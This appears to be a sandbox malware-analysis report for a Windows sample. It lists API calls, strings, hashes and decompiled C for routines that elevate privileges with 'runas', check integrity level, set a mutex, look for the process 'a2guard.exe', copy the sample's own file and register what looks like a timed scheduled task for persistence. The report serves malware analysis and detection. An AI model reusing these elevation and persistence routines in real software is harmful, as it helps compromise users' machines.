                        0x00401152
                        0x00401162
                        0x00401173
                        0x00401188
                        0x004011a4
                        0x004011a4
                        0x004011a9
                        0x004011ae
                        0x0040688d
                        0x00406892
                        0x00406892
                        0x00401119
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00401119
                        0x004010b3
                        0x004010bc
                        0x004010bc
                        0x004010bd
                        0x004010be
                        0x00000000
                        0x004010c4
                        0x00401055
                        0x0040105a
                        0x00401085
                        0x0040108a
                        0x00401091
                        0x0040107a
                        0x0040107f
                        0x0040107f
                        0x0040107f
                        0x00000000
                        0x0040107f
                        0x00000000
                        0x00401091
                        0x00000000

                        APIs
                        • CreateThread.KERNEL32 ref: 0040102B
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,00000000,00405B8B,00405CA9,00000000,00000000,?), ref: 0040103E
                          • Part of subcall function 00405D68: GetCurrentProcess.KERNEL32 ref: 00405D7F
                          • Part of subcall function 00405D68: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00405D8D
                          • Part of subcall function 00405D68: LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?), ref: 00405D9F
                          • Part of subcall function 00405D68: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?), ref: 00405DB6
                          • Part of subcall function 00405D68: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DC4
                          • Part of subcall function 00405D68: LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DCE
                          • Part of subcall function 00405D68: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 00405DE5
                          • Part of subcall function 00405D68: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DF5
                          • Part of subcall function 00405D68: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405E0D
                          • Part of subcall function 00405D68: CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405E15
                        • ShellExecuteA.SHELL32(00000000,runas,?,00000000,00000000,00000001), ref: 0040107A
                        • OpenMutexA.KERNEL32 ref: 004010F0
                        • CreateMutexA.KERNEL32(00000000,00000000,llfujo,00100000,00000000,llfujo,00000018,00000004,start,00000000,?,00000100,00000000,00000000,00405B8B,00405CA9), ref: 00401104
                        • EnumWindows.USER32(0040593C,00000000), ref: 0040112B
                        • Sleep.KERNEL32(00002710), ref: 00401135
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,a2guard.exe,00002710,0040593C,00000000,00002710), ref: 00401162
                        • CopyFileA.KERNEL32(?,?,00000000), ref: 00401188
                        • Sleep.KERNEL32(0000EA60,a2guard.exe,00002710,0040593C,00000000,00002710), ref: 004011AE
                        • ExitProcess.KERNEL32(00000000,0000EA60,a2guard.exe,00002710,0040593C,00000000,00002710), ref: 0040688D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Local$FileProcessToken$AllocCreateFreeInformationModuleMutexNameOpenSleep$AuthorityCloseCopyCurrentEnumExecuteExitHandleShellThreadWindows
                        • String ID: a2guard.exe$llfujo$runas$start
                        • API String ID: 1435776417-3039685001
                        • Opcode ID: 2c828131cb5b96cb6c7bf25788c3b10fd48efff84e178d15aa7624ad88424ee7
                        • Instruction ID: 6113a8e171c7203dfa25af26a0df34495cbacbd04f334ca6a816e8c263424983
                        • Opcode Fuzzy Hash: 2c828131cb5b96cb6c7bf25788c3b10fd48efff84e178d15aa7624ad88424ee7
                        • Instruction Fuzzy Hash: 0E41C9B0A80308AAEB30B751CD43F997268AF44B04F1144BFB745BA1D2DAFC56C58E6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 74%
                        			E004053B9(void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                        				void* _v8;
                        				void* _v12;
                        				char _v1032;
                        				char _v1036;
                        				void* _v1040;
                        				char _v1044;
                        				char _v1056;
                        				short _v1060;
                        				intOrPtr _v1068;
                        				intOrPtr _v1072;
                        				short _v1074;
                        				short _v1076;
                        				short _v1078;
                        				short _v1080;
                        				short _v1082;
                        				short _v1084;
                        				short _v1086;
                        				short _v1088;
                        				char _v1092;
                        				void* _v1096;
                        				struct _SYSTEMTIME _v1112;
                        				struct _FILETIME _v1120;
                        				char _v1376;
                        				char _v1888;
                        				char _v2144;
                        				char _v2400;
                        				char _v2656;
                        				char _v2912;
                        				char _v3168;
                        				char _v3424;
                        				char* _t102;
                        				intOrPtr* _t111;
                        				void* _t113;
                        				intOrPtr* _t114;
                        				intOrPtr* _t115;
                        				void* _t120;
                        				intOrPtr* _t122;
                        				intOrPtr* _t126;
                        				intOrPtr* _t128;
                        				intOrPtr* _t132;
                        				intOrPtr* _t135;
                        				void* _t143;
                        				short _t151;
                        				intOrPtr* _t154;
                        				intOrPtr* _t160;
                        				intOrPtr* _t163;
                        				intOrPtr* _t165;
                        				intOrPtr* _t167;
                        				intOrPtr* _t169;
                        				intOrPtr* _t174;
                        
                        				E00406460(__eflags, _a4,  &_v1376);
                        				E00406460(__eflags, _a12,  &_v1888);
                        				E00405708(__eflags, _a4); // executed
                        				_push(0);
                        				L00406A66();
                        				E00406270(0x4080c3, 0x10,  &_v2400);
                        				E00406270(0x4080d3, 0x10,  &_v2656);
                        				_push( &_v8);
                        				_push( &_v2656);
                        				_push(1);
                        				_push(0);
                        				_t102 =  &_v2400;
                        				_push(_t102);
                        				L00406A60();
                        				if(_t102 >= 0) {
                        					E00406270(0x4080e3, 0x10,  &_v2912);
                        					E00406270(0x4080f3, 0x10,  &_v3168);
                        					_t111 = _v8;
                        					_t113 =  *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x20))))(_t111,  &_v1376,  &_v3168,  &_v2912,  &_v12); // executed
                        					if(_t113 >= 0) {
                        						_t115 = _v12;
                        						 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 0x70))))(_t115, 0x2202);
                        						E00406259( &_v1036, 0x400); // executed
                        						_t120 = E00405D68(); // executed
                        						if(_t120 != 0x4000 && _t120 != 0x3000) {
                        							_v1036 = 0x100;
                        							_push( &_v1036);
                        							_push( &_v1032);
                        							_push(2);
                        							L00406A9C();
                        						}
                        						_t122 = _v12;
                        						 *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x78))))(_t122,  &_v1032, 0);
                        						_t126 = _v12;
                        						 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x80))))(_t126,  &_v1888); // executed
                        						_t209 = _a16;
                        						if(_a16 != 0) {
                        							E00406460(_t209, _a16,  &_v2144);
                        							_t174 = _v12;
                        							 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 0x88))))(_t174,  &_v2144);
                        						}
                        						_t128 = _v12;
                        						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0xa8))))(_t128, 0xd65cb580);
                        						_push( &_v1040);
                        						_push( &_v1044);
                        						_t132 = _v12;
                        						_push(_t132);
                        						if( *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))() >= 0) {
                        							E00406259( &_v1092, 0x30);
                        							GetLocalTime( &_v1112);
                        							SystemTimeToFileTime( &_v1112,  &_v1120);
                        							_t143 = 0x47868c00;
                        							if(_a20 == 1) {
                        								_t143 = 0x29b92700;
                        							}
                        							_v1120.dwLowDateTime = _v1120.dwLowDateTime + _t143;
                        							asm("adc [ebp-0x458], edx");
                        							FileTimeToSystemTime( &_v1120,  &_v1112);
                        							if(_a20 == 0) {
                        								_v1060 = 1;
                        								_v1056 = 1;
                        								_v1072 = 0x5a0;
                        								_v1068 = 2;
                        							}
                        							_v1092 = 0x30;
                        							_v1074 = _v1112.wMinute;
                        							_v1076 = _v1112.wHour;
                        							_v1084 = _v1112.wDay;
                        							_v1086 = _v1112.wMonth;
                        							_t151 = _v1112.wYear;
                        							_v1088 = _t151;
                        							_v1082 = _t151 + 0x64;
                        							_v1080 = 1;
                        							_v1078 = 1;
                        							_t154 = _v1040;
                        							 *((intOrPtr*)( *((intOrPtr*)( *_t154 + 0xc))))(_t154,  &_v1092);
                        							E00406270(0x408103, 0x10,  &_v3424);
                        							_push( &_v1096);
                        							_push( &_v3424);
                        							_t160 = _v12;
                        							_push(_t160);
                        							if( *((intOrPtr*)( *((intOrPtr*)( *_t160))))() >= 0) {
                        								_t165 = _v1096;
                        								 *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x18))))(_t165, 0, 1); // executed
                        								if(_a24 != 0) {
                        									_t169 = _v12;
                        									 *((intOrPtr*)( *((intOrPtr*)( *_t169 + 0x30))))(_t169); // executed
                        								}
                        								_t167 = _v1096;
                        								 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 8))))(_t167);
                        							}
                        							_t163 = _v1040;
                        							 *((intOrPtr*)( *((intOrPtr*)( *_t163 + 8))))(_t163);
                        						}
                        						_t135 = _v12;
                        						 *((intOrPtr*)( *((intOrPtr*)( *_t135 + 8))))(_t135);
                        					}
                        					_t114 = _v8;
                        					_t102 =  *((intOrPtr*)( *((intOrPtr*)( *_t114 + 8))))(_t114);
                        				}
                        				L00406A6C();
                        				return _t102;
                        			}





















































                        0x004053cf
                        0x004053de
                        0x004053e6
                        0x004053eb
                        0x004053ed
                        0x00405400
                        0x00405413
                        0x0040541b
                        0x00405422
                        0x00405423
                        0x00405425
                        0x00405427
                        0x0040542d
                        0x0040542e
                        0x00405436
                        0x0040544a
                        0x0040545d
                        0x0040547b
                        0x00405484
                        0x00405489
                        0x00405494
                        0x0040549d
                        0x004054ab
                        0x004054b0
                        0x004054ba
                        0x004054c6
                        0x004054d6
                        0x004054dd
                        0x004054de
                        0x004054e0
                        0x004054e0
                        0x004054ee
                        0x004054f7
                        0x00405500
                        0x0040550c
                        0x0040550e
                        0x00405512
                        0x0040551e
                        0x0040552a
                        0x00405536
                        0x00405536
                        0x0040553d
                        0x00405549
                        0x00405551
                        0x00405558
                        0x00405559
                        0x0040555e
                        0x00405567
                        0x00405576
                        0x00405582
                        0x00405595
                        0x0040559a
                        0x004055a3
                        0x004055a5
                        0x004055a5
                        0x004055ac
                        0x004055b2
                        0x004055c6
                        0x004055cf
                        0x004055d1
                        0x004055db
                        0x004055e2
                        0x004055ec
                        0x004055ec
                        0x004055f6
                        0x00405606
                        0x00405614
                        0x00405622
                        0x00405630
                        0x00405637
                        0x0040563e
                        0x00405649
                        0x00405650
                        0x00405659
                        0x00405669
                        0x00405675
                        0x00405685
                        0x00405690
                        0x00405697
                        0x00405698
                        0x0040569d
                        0x004056a5
                        0x004056ab
                        0x004056b7
                        0x004056bd
                        0x004056bf
                        0x004056c8
                        0x004056c8
                        0x004056ca
                        0x004056d6
                        0x004056d6
                        0x004056d8
                        0x004056e4
                        0x004056e4
                        0x004056e6
                        0x004056ef
                        0x004056ef
                        0x004056f1
                        0x004056fa
                        0x004056fa
                        0x004056fc
                        0x00405705

                        APIs
                          • Part of subcall function 00405708: CoInitialize.OLE32(00000000), ref: 00405726
                          • Part of subcall function 00405708: CoCreateInstance.OLE32(?,00000000,00000001,?,?,004080D3,00000010,?,004080C3,00000010,?,?,?,?,?,000000C7), ref: 00405767
                          • Part of subcall function 00405708: CoUninitialize.OLE32(?,00000000,00000001,?,?,004080D3,00000010,?,004080C3,00000010,?,?,?,?,?,000000C7), ref: 0040579D
                        • CoInitialize.OLE32(00000000), ref: 004053ED
                        • CoCreateInstance.OLE32(?,00000000,00000001,?,?,004080D3,00000010,?,004080C3,00000010,?,00000000,?,?,?,?), ref: 0040542E
                        • CoUninitialize.OLE32(?,00000000,00000001,?,?,004080D3,00000010,?,004080C3,00000010,?,00000000,?,?,?,?), ref: 004056FC
                          • Part of subcall function 00405D68: GetCurrentProcess.KERNEL32 ref: 00405D7F
                          • Part of subcall function 00405D68: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 00405D8D
                          • Part of subcall function 00405D68: LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?), ref: 00405D9F
                          • Part of subcall function 00405D68: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?), ref: 00405DB6
                          • Part of subcall function 00405D68: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DC4
                          • Part of subcall function 00405D68: LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DCE
                          • Part of subcall function 00405D68: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 00405DE5
                          • Part of subcall function 00405D68: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405DF5
                          • Part of subcall function 00405D68: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405E0D
                          • Part of subcall function 00405D68: CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00405E15
                        • GetUserNameExW.SECUR32(00000002,?,?,?,00000400,?,004050FE,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 004054E0
                        • GetLocalTime.KERNEL32(?,?,00000030,?,004050FE,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 00405582
                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,004050FE,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 00405595
                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,004050FE,?,00000014,?,00000000,00000001,00000000,00000018), ref: 004055C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: LocalTime$Token$AllocCreateFileFreeInformationInitializeInstanceProcessSystemUninitialize$AuthorityCloseCurrentHandleNameOpenUser
                        • String ID: 0
                        • API String ID: 1653648096-4108050209
                        • Opcode ID: 1416d626cde14abad24a5d1ac5d59f774d36b54aeb1413cca8561d0514f05c44
                        • Instruction ID: f98987ca68586339910774720971a15c6aefd3cbd132fbb1928298114670a648
                        • Opcode Fuzzy Hash: 1416d626cde14abad24a5d1ac5d59f774d36b54aeb1413cca8561d0514f05c44
                        • Instruction Fuzzy Hash: 66A1EBB5900618AFDB10EB94CC85FDA73BCEF48304F1041EAE609E7291D675AE85CF69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E004057A9(void* __eflags, intOrPtr _a4) {
                        				void* _v8;
                        				char _v16;
                        				char _v268;
                        				void* _v304;
                        				char _v560;
                        				char _v816;
                        				char _v820;
                        				void* _t26;
                        				int _t33;
                        				char _t43;
                        				char* _t50;
                        				void* _t51;
                        
                        				E00406259( &_v820,  &_v16 - _t51);
                        				E00406270(_a4, 0xffffffff,  &_v560);
                        				_t26 = CreateToolhelp32Snapshot(2, 0); // executed
                        				_v8 = _t26;
                        				_t53 = _t26 - 0xffffffff;
                        				if(_t26 == 0xffffffff) {
                        					L13:
                        					return _v820;
                        				}
                        				E00406259( &_v304, 0x128);
                        				_v304 = 0x128;
                        				E00406788(_t53, E00406698("kernel32.dll"), "Process32First"); // executed
                        				_t33 = Process32First(_v8,  &_v304); // executed
                        				while(_t33 != 0) {
                        					E004061D2( &_v268,  &_v816, E00406492(__eflags,  &_v268) + 1);
                        					_t50 =  &_v816;
                        					while(1) {
                        						__eflags =  *_t50;
                        						if(__eflags == 0) {
                        							break;
                        						}
                        						__eflags =  *_t50 - 0x40;
                        						if( *_t50 > 0x40) {
                        							__eflags =  *_t50 - 0x5b;
                        							if( *_t50 < 0x5b) {
                        								 *_t50 =  *_t50 + 0x20;
                        								__eflags =  *_t50;
                        							}
                        						}
                        						_t50 = _t50 + 1;
                        						__eflags = _t50;
                        					}
                        					_t43 = E004064AD(__eflags,  &_v816,  &_v560);
                        					__eflags = _t43;
                        					if(_t43 == 0) {
                        						E00406788(__eflags, E00406698("kernel32.dll"), "Process32Next"); // executed
                        						_t33 = Process32Next(_v8,  &_v304); // executed
                        						continue;
                        					}
                        					_v820 = 1;
                        					break;
                        				}
                        				CloseHandle(_v8); // executed
                        				goto L13;
                        			}















                        0x004057c0
                        0x004057d1
                        0x004057da
                        0x004057df
                        0x004057e2
                        0x004057e5
                        0x004058be
                        0x004058c8
                        0x004058c8
                        0x004057f7
                        0x004057fc
                        0x00405820
                        0x00405825
                        0x004058ae
                        0x0040584a
                        0x0040584f
                        0x00405865
                        0x00405865
                        0x00405868
                        0x00000000
                        0x00000000
                        0x00405857
                        0x0040585a
                        0x0040585c
                        0x0040585f
                        0x00405861
                        0x00405861
                        0x00405861
                        0x0040585f
                        0x00405864
                        0x00405864
                        0x00405864
                        0x00405878
                        0x0040587d
                        0x0040587f
                        0x004058a7
                        0x004058ac
                        0x00000000
                        0x004058ac
                        0x00405881
                        0x00000000
                        0x00405881
                        0x004058b9
                        0x00000000

                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004057DA
                        • Process32First.KERNEL32(00000000,Process32First,kernel32.dll,?,?,?,00000128,?,000000FF,?,?,?,llfujo,?,00000003), ref: 00405825
                        • CloseHandle.KERNEL32(?,?,00000003), ref: 004058B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                        • String ID: Process32First$Process32Next$kernel32.dll$llfujo
                        • API String ID: 1083639309-1672676195
                        • Opcode ID: 90ccef5e42fa6b801eed3ad52623905751d2fb4a3480df7ab84e29cf1ff3a3c2
                        • Instruction ID: 83b2698786be0b0d411bafa2a389ddecbae14efb72efee28d017c27dc9acba47
                        • Opcode Fuzzy Hash: 90ccef5e42fa6b801eed3ad52623905751d2fb4a3480df7ab84e29cf1ff3a3c2
                        • Instruction Fuzzy Hash: E9316172800218BADB11FBB5CC45FDE76AC9F04314F1049BBB596B20C1DA789BA58F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 64%
                        			E00405708(void* __eflags, intOrPtr _a4) {
                        				void* _v8;
                        				char _v16;
                        				char _v1032;
                        				char _v1288;
                        				char _v1544;
                        				char* _t23;
                        				intOrPtr* _t27;
                        				intOrPtr* _t29;
                        				void* _t36;
                        
                        				E00406259( &_v1544,  &_v16 - _t36);
                        				_push(0);
                        				L00406A66();
                        				E00406270(0x4080c3, 0x10,  &_v1288);
                        				E00406270(0x4080d3, 0x10,  &_v1544);
                        				_push( &_v8);
                        				_push( &_v1544);
                        				_push(1);
                        				_push(0);
                        				_t23 =  &_v1288;
                        				_push(_t23); // executed
                        				L00406A60(); // executed
                        				_t38 = _t23;
                        				if(_t23 >= 0) {
                        					E00406460(_t38, _a4,  &_v1032);
                        					_t27 = _v8;
                        					 *((intOrPtr*)( *((intOrPtr*)( *_t27 + 0x1c))))(_t27,  &_v1032); // executed
                        					_t29 = _v8;
                        					_t23 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 8))))(_t29); // executed
                        				}
                        				L00406A6C(); // executed
                        				return _t23;
                        			}












                        0x0040571f
                        0x00405724
                        0x00405726
                        0x00405739
                        0x0040574c
                        0x00405754
                        0x0040575b
                        0x0040575c
                        0x0040575e
                        0x00405760
                        0x00405766
                        0x00405767
                        0x0040576c
                        0x0040576f
                        0x0040577b
                        0x00405787
                        0x00405790
                        0x00405792
                        0x0040579b
                        0x0040579b
                        0x0040579d
                        0x004057a6

                        APIs
                        • CoInitialize.OLE32(00000000), ref: 00405726
                        • CoCreateInstance.OLE32(?,00000000,00000001,?,?,004080D3,00000010,?,004080C3,00000010,?,?,?,?,?,000000C7), ref: 00405767
                        • CoUninitialize.OLE32(?,00000000,00000001,?,?,004080D3,00000010,?,004080C3,00000010,?,?,?,?,?,000000C7), ref: 0040579D
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize
                        • String ID:
                        • API String ID: 948891078-0
                        • Opcode ID: 7fc796c382f08209cf93ca614f8895deed795ba6064a381d794a2e794069cf47
                        • Instruction ID: 9cd06cfbad9ed7532fb61dc6aa78afd82c0923f9754ac24d16ef4cd3a063a98b
                        • Opcode Fuzzy Hash: 7fc796c382f08209cf93ca614f8895deed795ba6064a381d794a2e794069cf47
                        • Instruction Fuzzy Hash: 2A115EB6600208BEDB10FBA5CD81FDF736C9B48304F1144AAB306F31C1DA75AA558F69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 286 86092b-860970 GetPEB 287 860972-860978 286->287 288 86098c-86098e 287->288 289 86097a-86098a call 860d35 287->289 288->287 291 860990 288->291 289->288 294 860992-860994 289->294 293 860996-860998 291->293 295 860a3b-860a3e 293->295 294->293 296 86099d-8609d3 294->296 297 8609dc-8609ee call 860d0c 296->297 300 8609d5-8609d8 297->300 301 8609f0-860a3a 297->301 300->297 301->295
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308176286.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$GetProcAddress.$l
                        • API String ID: 0-2784972518
                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction ID: 4065d71a46144b7d70e706176126d4be5aa55b13b96e973cac2a78efb894ae32
                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction Fuzzy Hash: AB3128B6900619DFDB10CF99C880AAEBBF5FF48324F25414AD441E7251D771EA45CFA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 319 b1126a-b1126d 320 b11255-b11269 319->320 321 b1126e-b1126f 319->321 320->319 322 b11271-b112cb 321->322 323 b11270 321->323 326 b112cd-b112e5 322->326 323->322 326->326 327 b112e7-b11344 326->327 331 b113b2-b11407 327->331 332 b11346-b1135d 327->332 335 b11409-b114fb 331->335 333 b11345-b1135d 332->333 334 b1135f-b113a4 332->334 333->333 333->334 334->335 338 b113a6-b113b0 334->338 346 b114fd-b11504 335->346 338->331 346->346 347 b11506-b11520 346->347 348 b11525-b1153d 347->348 348->348 349 b1153f-b1159b 348->349 352 b1159d-b115b5 349->352 352->352 353 b115b7-b1168c 352->353 361 b1168d-b116a5 353->361 364 b116a7-b1171c 361->364 369 b11799-b117db 364->369 370 b1171e-b11797 364->370 373 b117dd-b117f3 369->373 370->369 375 b117f5 373->375 375->373 377 b117f7-b1180d 375->377 377->375 379 b1180f-b1186e 377->379 384 b11870-b11874 379->384 384->384 385 b11876-b118b4 384->385 386 b11914-b11a04 385->386 387 b118b6-b11912 385->387 392 b11a06-b11a3b 386->392 393 b11a3e-b11af8 386->393 387->386 392->393
                        Memory Dump Source
                        • Source File: 00000000.00000002.308267503.0000000000B11000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B11000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_b11000_i1lq1Qpbyw.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: efbea0cf5f7883a902fda69d7606f0091456b1f032a723b34b2e789163b599ac
                        • Instruction ID: cc7eaf77cc920fffe7da4fb9c6743fc477c14c5ff3d10897c65e34135785166f
                        • Opcode Fuzzy Hash: efbea0cf5f7883a902fda69d7606f0091456b1f032a723b34b2e789163b599ac
                        • Instruction Fuzzy Hash: B572429A80E7C05FE7038B34282A6917FB55E23254B4F15D7C0E4CF2B3E4094A5AEB76
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 62%
                        			E00405B8B(intOrPtr _a4) {
                        				struct HINSTANCE__* _v8;
                        				struct _WNDCLASSA _v48;
                        				struct HWND__* _v52;
                        				struct tagMSG _v80;
                        				char _v336;
                        				char _v592;
                        				struct HICON__* _t38;
                        				struct HWND__* _t43;
                        				void* _t54;
                        				void* _t55;
                        
                        				E00406259( &_v592, _t54 - _t55);
                        				E00406270("Microsoft", 0xa,  &_v336);
                        				E00406270("win32app", 9,  &_v592);
                        				_v8 = GetModuleHandleA(0);
                        				_v48.style = 0;
                        				_v48.lpfnWndProc = _a4;
                        				_v48.cbClsExtra = 0;
                        				_v48.cbWndExtra = 0;
                        				_v48.hInstance = _v8;
                        				_v48.lpszMenuName = 0;
                        				_v48.lpszClassName =  &_v592;
                        				_t38 = LoadIconA(0, 0x7f04); // executed
                        				_v48.hIcon = _t38;
                        				_v48.hCursor = LoadCursorA(0, 0x7f01);
                        				_v48.hbrBackground = 6;
                        				RegisterClassA( &_v48);
                        				_push(0);
                        				_push(_v8);
                        				_push(0);
                        				_push(0);
                        				_push(0x96);
                        				_push(0x1f4);
                        				_push(0xfa0);
                        				_push(0xfa0);
                        				_push(0xc80000);
                        				_push( &_v336);
                        				_t43 =  &_v592;
                        				_push(_t43);
                        				ExitProcess(0x80); // executed
                        				_v52 = _t43;
                        				ShowWindow(_v52, 1); // executed
                        				UpdateWindow(_v52);
                        				L1:
                        				GetMessageA( &_v80, 0, 0, 0);
                        				TranslateMessage( &_v80);
                        				DispatchMessageA( &_v80);
                        				goto L1;
                        			}













                        0x00405b9f
                        0x00405bb2
                        0x00405bc5
                        0x00405bd1
                        0x00405bd4
                        0x00405bde
                        0x00405be1
                        0x00405be8
                        0x00405bf2
                        0x00405bf5
                        0x00405c02
                        0x00405c0c
                        0x00405c11
                        0x00405c20
                        0x00405c23
                        0x00405c2e
                        0x00405c33
                        0x00405c35
                        0x00405c38
                        0x00405c3a
                        0x00405c3c
                        0x00405c41
                        0x00405c46
                        0x00405c4b
                        0x00405c50
                        0x00405c5b
                        0x00405c5c
                        0x00405c62
                        0x00405c68
                        0x00405c6d
                        0x00405c75
                        0x00405c7d
                        0x00405c82
                        0x00405c8c
                        0x00405c95
                        0x00405c9e
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNEL32(00000000,win32app,00000009,?,Microsoft,0000000A,?,?), ref: 00405BCC
                        • LoadIconA.USER32 ref: 00405C0C
                        • LoadCursorA.USER32 ref: 00405C1B
                        • RegisterClassA.USER32 ref: 00405C2E
                        • ExitProcess.KERNEL32(00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000,00000000,00000000,00007F01,00000000), ref: 00405C68
                        • ShowWindow.USER32(?,00000001,00000080,?,?,00C80000,00000FA0,00000FA0,000001F4,00000096,00000000,00000000,?,00000000,00000000,00000000), ref: 00405C75
                        • UpdateWindow.USER32(?), ref: 00405C7D
                        • GetMessageA.USER32 ref: 00405C8C
                        • TranslateMessage.USER32(?), ref: 00405C95
                        • DispatchMessageA.USER32 ref: 00405C9E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.308108049.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_i1lq1Qpbyw.jbxd
                        Similarity
                        • API ID: Message$LoadWindow$ClassCursorDispatchExitHandleIconModuleProcessRegisterShowTranslateUpdate
                        • String ID: Microsoft$win32app
                        • API String ID: 2466556465-2644191155
                        • Opcode ID: c0988211585519f28889d20caa47f2a62cf186668c5d987b6ff5aa59d4caad1a
                        • Instruction ID: b51f43f874003ff8127150a47dd4a647143a6de580d3d9b096764c2d0bfd1006
                        • Opcode Fuzzy Hash: c0988211585519f28889d20caa47f2a62cf186668c5d987b6ff5aa59d4caad1a
                        • Instruction Fuzzy Hash: 6A310CB1E51208BAEB50EFA5CC46FDD77B8AB04704F10807AF605BA1C1D7B956188B69
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00405D68() {
                        				void* _v8;
                        				void** _v16;
                        				long _v20;
                        				long _v24;
                        				int _t30;
                        
                        				_v24 = 0;
                        				_v20 = 8;
                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                        					_v16 = LocalAlloc(0, _v20);
